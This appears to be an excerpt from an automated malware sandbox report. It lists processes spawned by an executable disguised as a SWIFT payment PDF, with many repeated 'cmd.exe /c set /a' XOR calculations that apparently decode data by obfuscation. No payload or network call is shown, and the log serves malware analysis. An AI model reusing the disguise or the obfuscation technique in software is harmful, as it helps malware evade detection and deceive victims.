          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"Jump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"Jump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"Jump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"Jump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "242^177"Jump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "153^177"Jump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "220^177"Jump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "157^177"Jump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"Jump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "193^177"Jump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"Jump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"Jump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"Jump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"Jump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"Jump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "133^177"Jump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "242^177"Jump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"Jump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "201^177"Jump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "137^177"Jump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "250^177"Jump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "255^177"Jump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"Jump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"Jump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "137^177"Jump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "253^177"Jump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "195^177"Jump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"Jump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "212^177"Jump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "153^177"Jump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "220^177"Jump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "131^177"Jump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"Jump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "157^177"Jump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "242^177"Jump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "212^177"Jump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"Jump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"Jump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "157^177"Jump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "137^177"Jump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"Jump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"Jump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"Jump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "227^177"Jump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"Jump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "216^177"Jump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"Jump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "131^177"Jump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "157^177"Jump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"Jump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"Jump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "253^177"Jump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "221^177"Jump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "242^177"Jump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"Jump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "242^177"Jump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 1268 -s 1092Jump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"Jump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "240^177"Jump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: unknown unknownJump to behavior
